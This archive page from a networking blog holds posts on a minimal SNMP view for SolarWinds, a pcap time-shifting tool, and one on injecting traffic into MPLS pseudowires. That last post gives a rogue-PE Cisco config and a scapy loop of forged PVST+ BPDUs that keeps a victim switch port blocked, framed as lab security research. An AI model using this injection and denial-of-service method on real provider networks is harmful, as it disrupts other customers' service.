Networking Bodges: January 2015

Friday, 23 January 2015

Minimal SNMP View for Solarwinds Management of a Cisco Device

Some time ago, I was asked to provide a customer read-only SNMP access to a router so that they could monitor bandwidth utilisation. Unfortunately the device had some sensitive configuration which needed to be protected, so giving access to the full MIB was not an option. With that in mind, I set up an SNMP view which permitted access to the ifMIB and nothing else, thinking that would be sufficient to monitor interface usage.

The customer tested and soon came back to advise me that, although he could successfully run an SNMP walk, his Solarwinds NMS could not discover the device and therefore he couldn't get the stats he needed.

It turns out that Solarwinds needs a particular set of OIDs to be visible before it will allow a device to be discovered and brought under management. There are a few articles on the knowledge base about which OIDs it uses for various purposes, e.g.:

http://knowledgebase.solarwinds.com/kb/questions/1196/What+object+IDs+(OIDs)+does+Orion+NPM+poll+for+interface+information%3F+What+types+of+interface+information+does+Orion+NPM+poll%3F

http://knowledgebase.solarwinds.com/kb/questions/1196/

However, there doesn't seem to be one directly addressing the question of which OIDs are required just to bring a device under management.

Eventually I think I gave up and sniffed a discovery off the wire and looked at which OIDs it used - I don't exactly remember any more. Anyway, here is a list that seems to do the trick. The following CLI should configure a minimal set of OIDs on a Cisco device:

snmp-server view STATS iso excluded
snmp-server view STATS mib-2 excluded
snmp-server view STATS cisco excluded
snmp-server view STATS system.1.0 included
snmp-server view STATS system.2.0 included
snmp-server view STATS system.4.0 included
snmp-server view STATS system.5.0 included
snmp-server view STATS system.6.0 included
snmp-server view STATS ifIndex included
snmp-server view STATS ifDescr included
snmp-server view STATS ifSpeed included
snmp-server view STATS ifOperStatus included
snmp-server view STATS ipAddrEntry.2 included
snmp-server view STATS lsystem.8 included
snmp-server view STATS lsystem.58 included
snmp-server view STATS chassis.6 included
snmp-server view STATS ifName included
snmp-server view STATS ifHCInOctets included
snmp-server view STATS ifHCInUcastPkts included
snmp-server view STATS ifHCInMulticastPkts included
snmp-server view STATS ifHCInBroadcastPkts included
snmp-server view STATS ifHCOutOctets included
snmp-server view STATS ifHCOutUcastPkts included
snmp-server view STATS ifHCOutMulticastPkts included
snmp-server view STATS ifHCOutBroadcastPkts included
snmp-server view STATS ifHighSpeed included
snmp-server view STATS ifAlias included
snmp-server view STATS ciscoMemoryPoolEntry.5 included
snmp-server view STATS ciscoMemoryPoolEntry.6 included
snmp-server view STATS cpmCPUTotalTable.1.5 included
snmp-server view STATS cpmCPUTotalTable.1.8 included

Once the view is defined, you just need to apply it to the particular community string for SNMPv2c:

snmp-server community mycomm view STATS RO

Or to the group for SNMPv3 (leaving out the write view, so that access stays read-only):

snmp-server group Monitoring v3 priv read STATS

This config allowed SolarWinds to discover the device and bring it under management. It also allowed basic port stats to be collected and general up/down alarms to be raised.

Of course, you can add more OIDs to the "included" list as needed for your particular use case, but these should be enough for SolarWinds to discover the device.
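If the list of OIDs changes often, the view commands can be generated rather than typed by hand. Here is a minimal Python sketch of that idea. The function name build_view and its parameters are made up for illustration and are not part of any Cisco or SolarWinds tooling; it only emits the same "snmp-server view" syntax used in the list above.

```python
def build_view(name, included, excluded=("iso", "mib-2", "cisco")):
    """Return IOS 'snmp-server view' lines for the given subtrees.

    name, included and excluded are illustrative parameters only.
    """
    # Exclude the broad subtrees first, then punch holes for the wanted OIDs.
    lines = ["snmp-server view %s %s excluded" % (name, oid) for oid in excluded]
    lines += ["snmp-server view %s %s included" % (name, oid) for oid in included]
    return lines


if __name__ == "__main__":
    for line in build_view("STATS", ["system.1.0", "ifDescr", "ifHCInOctets"]):
        print(line)
```

The output can be pasted into config mode; extra OIDs only need adding to the Python list.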

Adjusting timestamps in PCAP files

Many times in the past I've had to look at a pair of pcap files side by side in order to troubleshoot an issue. More often than not, one of the PCAP files was produced on a ropey old laptop whose clock is "almost right" - the timestamps between the two files then don't tie up and it is a pain to keep working out "if it's time X in that file, I need to look at time Y in this file..."

This week I overheard a colleague in the office having exactly that problem and thought it wouldn't be too hard to build a utility to time shift pcap files by a specified amount. So here it is:

https://github.com/theclam/capshift

Installation

As explained in the readme, it should be possible to compile on any system with gcc using only the standard libraries. Just download the capshift.c and capshift.h files and compile (gcc -o capshift capshift.c), or download a binary if one exists for your system.

Usage

Capshift takes three arguments, all mandatory:

The input pcap file, specified using -r
The output pcap file, specified using -w
The time offset value (positive or negative), specified using -o

Here's an example:

Harrys-MacBook-Air:capshift foeh$ tshark -ta -r before.cap
1 15:30:45.978539 192.168.1.25 -> 192.168.1.1 ICMP 74 Echo (ping) request id=0x0001, seq=4748/35858, ttl=128
2 15:30:45.979407 192.168.1.1 -> 192.168.1.25 ICMP 74 Echo (ping) reply    id=0x0001, seq=4748/35858, ttl=255
3 15:30:46.979315 192.168.1.25 -> 192.168.1.1 ICMP 74 Echo (ping) request id=0x0001, seq=4749/36114, ttl=128
4 15:30:46.980274 192.168.1.1 -> 192.168.1.25 ICMP 74 Echo (ping) reply    id=0x0001, seq=4749/36114, ttl=255
5 15:30:47.980323 192.168.1.25 -> 192.168.1.1 ICMP 74 Echo (ping) request id=0x0001, seq=4750/36370, ttl=128
6 15:30:47.981215 192.168.1.1 -> 192.168.1.25 ICMP 74 Echo (ping) reply    id=0x0001, seq=4750/36370, ttl=255
7 15:30:48.981387 192.168.1.25 -> 192.168.1.1 ICMP 74 Echo (ping) request id=0x0001, seq=4751/36626, ttl=128
8 15:30:48.982277 192.168.1.1 -> 192.168.1.25 ICMP 74 Echo (ping) reply    id=0x0001, seq=4751/36626, ttl=255
Harrys-MacBook-Air:capshift foeh$ capshift -r before.cap -w after.cap -o -0.5

Parsing capfile, attempting to shift backward by 0.500000 seconds...

8 frames processed.
Harrys-MacBook-Air:capshift foeh$ tshark -ta -r after.cap
1 15:30:45.478539 192.168.1.25 -> 192.168.1.1 ICMP 74 Echo (ping) request id=0x0001, seq=4748/35858, ttl=128
2 15:30:45.479407 192.168.1.1 -> 192.168.1.25 ICMP 74 Echo (ping) reply    id=0x0001, seq=4748/35858, ttl=255
3 15:30:46.479315 192.168.1.25 -> 192.168.1.1 ICMP 74 Echo (ping) request id=0x0001, seq=4749/36114, ttl=128
4 15:30:46.480274 192.168.1.1 -> 192.168.1.25 ICMP 74 Echo (ping) reply    id=0x0001, seq=4749/36114, ttl=255
5 15:30:47.480323 192.168.1.25 -> 192.168.1.1 ICMP 74 Echo (ping) request id=0x0001, seq=4750/36370, ttl=128
6 15:30:47.481215 192.168.1.1 -> 192.168.1.25 ICMP 74 Echo (ping) reply    id=0x0001, seq=4750/36370, ttl=255
7 15:30:48.481387 192.168.1.25 -> 192.168.1.1 ICMP 74 Echo (ping) request id=0x0001, seq=4751/36626, ttl=128
8 15:30:48.482277 192.168.1.1 -> 192.168.1.25 ICMP 74 Echo (ping) reply    id=0x0001, seq=4751/36626, ttl=255
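
For anyone curious about what a time shift involves, the sketch below shows the general idea in Python. It is not the capshift source, just an illustration under some assumptions: the input is a classic libpcap file with microsecond timestamps (not pcapng), and the function name shift_pcap is invented here.

```python
import struct

PCAP_GLOBAL_HDR_LEN = 24   # magic, version, thiszone, sigfigs, snaplen, linktype
PCAP_RECORD_HDR_LEN = 16   # ts_sec, ts_usec, incl_len, orig_len


def shift_pcap(data, offset_seconds):
    """Return a copy of classic pcap bytes with every timestamp shifted."""
    magic = data[:4]
    if magic == b"\xd4\xc3\xb2\xa1":
        endian = "<"          # file written in little-endian byte order
    elif magic == b"\xa1\xb2\xc3\xd4":
        endian = ">"          # file written in big-endian byte order
    else:
        raise ValueError("not a microsecond-resolution pcap file")

    # Work in whole microseconds to avoid floating point drift.
    offset_us = int(round(offset_seconds * 1000000))
    out = bytearray(data[:PCAP_GLOBAL_HDR_LEN])
    pos = PCAP_GLOBAL_HDR_LEN
    while pos + PCAP_RECORD_HDR_LEN <= len(data):
        sec, usec, incl_len, orig_len = struct.unpack_from(endian + "IIII", data, pos)
        total_us = sec * 1000000 + usec + offset_us
        sec, usec = divmod(total_us, 1000000)
        # struct.pack raises an error if the shift pushes a timestamp below zero.
        out += struct.pack(endian + "IIII", sec, usec, incl_len, orig_len)
        start = pos + PCAP_RECORD_HDR_LEN
        out += data[start:start + incl_len]   # packet bytes are copied untouched
        pos = start + incl_len
    return bytes(out)
```

Reading before.cap in binary mode, passing the bytes through shift_pcap(data, -0.5) and writing the result out should give the same kind of half-second shift as the example above.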

As usual, if you find this useful or have any feedback (good or bad) please leave a comment!

Monday, 12 January 2015

Bending the MPLS Security Model - part 3 (Layer 2 Injection)

Attack 1 - layer 2 injection

Back in the days when I did solution validation and regression testing for a living, I normally had to set up full solutions in the lab, built to specific designs. I would then often need to test egress QoS policies, filters and so on. To be sure that ingress QoS and filters did not invalidate the results, I had a few options:

1. Temporarily remove the ingress policies, making sure they were re-applied correctly afterwards and that nobody else tested in the meantime

2. Build a duplicate service but instead of terminating the far end on a real device, emulate everything from IGP up on a tester

3. Cheat

Option 1 is pretty risky as "temporary" easily turns into "permanent" if you're not very careful. Option 2 is a lot of work and runs the risk of compromising the design in order to inter-operate with the tester.

Given the drawbacks of the other available options, I usually fell back on option 3. What I would do is set up the service as per design, then attach the tester somewhere in the MPLS core - basically any port that would label switch. The tester didn't need to peer any protocols at all, saving huge amounts of setup and troubleshooting time, as the packets would be hand crafted in true "dirty hack" style. All I had to do was look at the label bindings on the egress PE to work out what service label to use and on the first hop router to see what transport label needed to be used.

I'll make this example a little simpler by getting a router to do the ARP, work out the transport label and encapsulate the packets. Rest assured that it's perfectly possible to do this by hand if you don't have a real PE. We'll take a simple pseudowire service as an example. We have the following setup:

We want to make our traffic from device X come out of the PE towards LAN B, as if it had been sent through from LAN A. Two things are needed for this:

The transport label that will get traffic forwarded to router B
The service label that PE B expects to receive for the pseudowire

Now in my lab example, I could just log onto each of the devices and get these. The transport label to get to PE B can be found in the output of the neighbouring router's "show mpls ldp bindings" or similar; in our example we will just let the "evil" PE learn it via LDP. The service label can be found in the bindings list for PE A or PE B, sniffed from live traffic if you have access to somewhere in the switching path, or guessed using the information in the previous post.

Anyway, we can use the evil PE to do most of the donkey work for us as far as encapsulation goes. With a fairly simple config, the PE can be made to inject into whatever service we like. Because this is a static config, the evil PE doesn't tell any other devices we are doing this.

Here's the config from the evil PE (Cisco IOS):

mpls label range 100 1048575 static 16 99

interface GigabitEthernet1/1
 no ip address
 xconnect 10.255.255.2 100 encapsulation mpls manual
  mpls label 99 19
  mpls control-word

The first line (the mpls label range command) simply reserves part of the label range for static allocation. To build the bogus EoMPLS service we need to statically assign an incoming label, even though it will never be used. By default, IOS doesn't reserve any of the label space for static allocation and, until you do, you can't assign a manual label. In this example we designate that labels 100 - 1048575 are to be used for dynamic allocation (i.e. given out by LDP, BGP) and labels 16 - 99 are reserved for static allocation, though the actual numbers aren't important.

The interface section looks very similar to a normal EoMPLS service build, except for the use of the keyword "manual" and the MPLS tweaks inside. The manual keyword does exactly what you would expect, i.e. it tells the router that this VC will not be signalled using LDP but rather the parameters are going to be manually (statically) configured.

Once in the xconnect context we define what labels the service will use in each direction - inbound first (we don't care what this is) and then outbound (this has to match the label expected by the EoMPLS service into which we are trying to inject traffic). Remember, you may have to guess the outbound label if you don't have access to either of the serving PEs.

Finally, depending on the vendor and / or configuration of the serving PEs you may need to adjust the control-word setting. Cisco and recent Junipers default to enabled, Alcatel-Lucent and older Junipers default to disabled.
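
For the "by hand" route, what has to sit in front of the customer's frame is just two label stack entries and, if enabled, a control word. The Python sketch below packs them using the standard 32-bit MPLS layout (20-bit label, 3-bit traffic class, bottom-of-stack bit, 8-bit TTL). The function names are invented for illustration, the transport label 1234 is a made-up value, and the all-zero control word assumes no sequencing or flags are in use.

```python
import struct


def mpls_entry(label, tc=0, bottom=False, ttl=255):
    """Pack one 32-bit MPLS label stack entry."""
    if not 0 <= label < 2 ** 20:
        raise ValueError("label must fit in 20 bits")
    word = (label << 12) | ((tc & 0x7) << 9) | (int(bottom) << 8) | (ttl & 0xFF)
    return struct.pack("!I", word)


def pseudowire_header(transport_label, service_label, control_word=True):
    """Label stack, plus optional control word, that precedes the customer frame."""
    # Transport label on top, service label at the bottom of the stack.
    header = mpls_entry(transport_label) + mpls_entry(service_label, bottom=True)
    if control_word:
        header += b"\x00\x00\x00\x00"   # first nibble 0, no flags, sequence number 0
    return header


# 1234 is a hypothetical transport label; 19 is the outbound service label
# used in the xconnect config above.
print(pseudowire_header(1234, 19).hex())
```

On the wire these bytes follow an outer Ethernet header with EtherType 0x8847 and are followed by the complete customer Ethernet frame.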

Now, assuming the label is correct, any frames attacker "X" sends into the Evil PE will come out of the MPLS core and hit user B as if they had been sent by user A. This is unidirectional so the potential for "connecting" to anything is not really there, however there is a massive amount of harm that can be done at this point. Possible attacks range from a simple flood to spanning tree & LACP attacks, even creating IP conflicts or interfering with the operation of routing protocols.

Worked Example

Here's an example showing how an attacker can use the setup above to wreak havoc by throwing in some random PVST packets. The customer setup is as below, with a Cisco switch attached to each of the provider edge routers and a layer 2 service running between.

Note, the switches are running PVST over the link as per default. If a switch sees a BPDU marked as being from the "wrong" VLAN it will decide the port is "broken" (Cisco's terminology, not mine) and block it.

As an attacker we can use this to our advantage by sending frames for 2 different VLAN IDs towards one of the switches. That way, whatever the native VLAN ID of the receiving port is set to, at least one of the VLAN IDs will be incorrect and force the switch to block.

Here's a scruffy scapy loop to do that:

>>> import time
>>> outint='eth0'
>>> bridgemac='\x00\x00\x00\x00\x00\x01'
>>> while True:
...     sendp(Dot3(src='00:00:00:00:00:01', dst='01:80:c2:00:00:00')/LLC(dsap=170,ssap=170,ctrl=3)/Raw(load='\x00\x00\x0c\x01\x0b\x00\x00\x00\x00\x00\x80\x00'+bridgemac+'\x00\x00\x00\x00'+'\x80\x00'+bridgemac+'\x80\x01'+'\x00\x00\x14\x00\x02\x00\x0f\x00\x00'+'\x00\x00\x00\x02'+'\x00\x02'),iface=outint)
...     time.sleep(10)
...     sendp(Dot3(src='00:00:00:00:00:01', dst='01:80:c2:00:00:00')/LLC(dsap=170,ssap=170,ctrl=3)/Raw(load='\x00\x00\x0c\x01\x0b\x00\x00\x00\x00\x00\x80\x00'+bridgemac+'\x00\x00\x00\x00'+'\x80\x00'+bridgemac+'\x80\x01'+'\x00\x00\x14\x00\x02\x00\x0f\x00\x00'+'\x00\x00\x00\x02'+'\x00\x03'),iface=outint)
...
.
Sent 1 packets.
^C
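
The long hex strings in that loop are easier to follow when broken into fields. Here is a rough Python sketch that rebuilds the same Raw payload from named parts, with the VLAN ID as a parameter. The function name pvst_payload and the field labels in the comments are my reading of the bytes rather than anything official, so treat them as assumptions.

```python
import struct


def pvst_payload(vlan, bridge_mac=b"\x00\x00\x00\x00\x00\x01", priority=0x8000):
    """Build the SNAP header plus PVST+ BPDU bytes carried in Raw(load=...)."""
    snap = b"\x00\x00\x0c" + b"\x01\x0b"               # Cisco OUI, PVST+ protocol ID
    bpdu = struct.pack("!HBBB", 0, 0, 0, 0)            # protocol ID, version, type, flags
    bpdu += struct.pack("!H", priority) + bridge_mac   # root bridge ID
    bpdu += struct.pack("!I", 0)                       # root path cost
    bpdu += struct.pack("!H", priority) + bridge_mac   # sending bridge ID
    bpdu += struct.pack("!H", 0x8001)                  # port ID
    # Timers are in units of 1/256 s: message age 0, max age 20, hello 2, forward delay 15
    bpdu += struct.pack("!HHHH", 0, 20 * 256, 2 * 256, 15 * 256)
    tlv = b"\x00" + struct.pack("!HHH", 0, 2, vlan)    # pad byte, then VLAN TLV (type 0, length 2)
    return snap + bpdu + tlv


if __name__ == "__main__":
    # The two frames in the loop differ only in the final VLAN ID (2 and 3).
    print(pvst_payload(2).hex())
    print(pvst_payload(3).hex())
```

Written this way, it is obvious that only the last two bytes change between the two frames, which is all that is needed to guarantee a mismatch with whatever native VLAN the receiving port uses.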

As long as the loop continues, the port will always remain down. A nice DoS that would be pretty hard to figure out, even if the console messages are quite clear (below from a single BPDU):

SW2#
*Mar 1 02:04:21.755: %SPANTREE-2-RECV_PVID_ERR: Received BPDU with inconsistent peer vlan id 3 on FastEthernet0/1 VLAN1.
*Mar 1 02:04:21.755: %SPANTREE-2-BLOCK_PVID_LOCAL: Blocking FastEthernet0/1 on VLAN1. Inconsistent local vlan.
SW2#PVST+: restarted the forward delay timer for FastEthernet0/1
SW2#
*Mar 1 02:04:36.831: %SPANTREE-2-UNBLOCK_CONSIST_PORT: Unblocking FastEthernet0/1 on VLAN1. Port consistency restored.
SW2# PVST+:Inconsistency timer expired. inconsistency 0 cleared for FastEthernet0/1

One bad PVST+ BPDU will generally cause the port to block for anywhere between 10 and 50s. It's extremely efficient :)

References

http://www.cisco.com/c/en/us/td/docs/ios/mpls/configuration/guide/15_0s/mp_15_0s_book/mp_atom_pseud_prov.html

http://www.juniper.net/techpubs/en_US/junos12.2/topics/concept/layer-two-circuits-overview-solutions.html